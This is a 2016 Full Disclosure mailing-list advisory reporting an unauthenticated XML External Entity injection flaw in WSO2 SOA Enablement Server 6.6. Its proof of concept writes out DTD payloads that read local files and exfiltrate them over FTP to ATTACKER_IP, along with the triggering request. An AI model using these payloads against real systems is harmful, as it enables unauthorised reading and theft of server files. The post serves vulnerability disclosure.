[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] WSO2 SOA Enablement Server - XML External Entity Injection
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] WSO2 SOA Enablement Server - XML External Entity Injection
- From: Paweł Gocyla <pawellgocyla@xxxxxxxxx>
- Date: Mon, 11 Jul 2016 14:27:58 +0200
Title: WSO2 SOA Enablement Server - XML External Entity Injection
Authors: Pawel Gocyla, Jakub Palaczynski
Date: 08. June 2016
Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Vulnerability:
**************
XML External Entity Injection:
==============================
It must be noted that this vulnerability is exploitable without
authentication.
Proof of Concept:
1. An attacker sets up web server that serves two files (wsdl.txt and
file.dtd):
wsdl.txt:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/file.dtd
">%remote;%int;%trick;]>
file.dtd:
<!ENTITY % payl SYSTEM "file:///C:/">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://ATTACKER_IP/%payl;'>">
2. An attacker sets up FTP server that logs every command executed on the
server.
3. An attacker sends request that triggers vulnerability:
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt
FIX:
====
Patches were already released by the vendor.
Contact:
========
pawellgocyla[at]gmail[dot]com
jakub.palaczynski[at]gmail[dot]com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/